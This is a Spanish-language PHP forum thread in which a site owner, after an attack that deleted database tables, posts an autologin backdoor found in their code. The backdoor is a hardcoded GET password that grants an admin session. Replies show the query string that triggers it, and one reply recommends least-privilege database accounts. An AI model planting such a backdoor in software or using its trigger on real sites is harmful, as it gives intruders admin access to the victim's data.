Foros del Web » Programando para Internet » PHP »

ver datos de acceso a database

Estas en el tema de ver datos de acceso a database en el foro de PHP en Foros del Web. Hola , resulta que tengo un script y hace poco tuvimos un ataque mediante el cual entraron a nuestra database y borraron algunas tablas de ...
  #1 (permalink)  
Antiguo 14/07/2011, 17:23
 
Fecha de Ingreso: mayo-2010
Mensajes: 19
Antigüedad: 13 años, 11 meses
Puntos: 0
ver datos de acceso a database

Hola , resulta que tengo un script y hace poco tuvimos un ataque mediante el cual entraron a nuestra database y borraron algunas tablas de forma manual ; de manera que empezamos a investigar el codigo php y encontramos un backdoor de autologin.

Este es el codigo :

Código:
if ( $_GET['autologin'] == "runnow123@" )
{
    $admin = $db->fetchRow( "SELECT * FROM admin LIMIT 1" );
    $_SESSION['admin_username'] = $admin['username'];
    $_SESSION['admin_password'] = $admin['password'];
    header( "location: admin.php?view=dashboard" );
    exit( );
Me gustaria saber como ejecutar ese codigo para saber como hicieron para entrar en mi database o si tienen mayor informacion es de gran ayuda.

Muchas gracias.
  #2 (permalink)  
Antiguo 14/07/2011, 17:32
Avatar de truman_truman  
Fecha de Ingreso: febrero-2010
Ubicación: /home/user
Mensajes: 1.341
Antigüedad: 14 años, 2 meses
Puntos: 177
Respuesta: ver datos de acceso a database

Yo creo que pusieron esto en la barra de direcciones del navegador

autologin="runnow123@"

y entraron como admin
.
__________________
la la la
  #3 (permalink)  
Antiguo 14/07/2011, 17:32
 
Fecha de Ingreso: agosto-2010
Mensajes: 40
Antigüedad: 13 años, 8 meses
Puntos: 2
Respuesta: ver datos de acceso a database

accediendo a es archivo con php y enviando los datos por get?? nose si lo entendi bien.

seria del tipo

archivo.php?autologuin=runnow123@
  #4 (permalink)  
Antiguo 14/07/2011, 18:06
Avatar de _ssx  
Fecha de Ingreso: mayo-2003
Ubicación: mX
Mensajes: 683
Antigüedad: 20 años, 11 meses
Puntos: 60
Respuesta: ver datos de acceso a database

Por eso lo mas conveniente independiente de tu código es crear un usuario de la DB con privilegios limitados a hacer insert, select y uno diferente para los delete de registros NUNCA privilegios de creación y eliminación de TABLAS.
__________________
Escribe tu código de forma que refleje, y saque a relucir,lo mejor de tu carácter personal
www.oscararzola.com/blog
Principios de un programador

Etiquetas: database, tabla
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:45.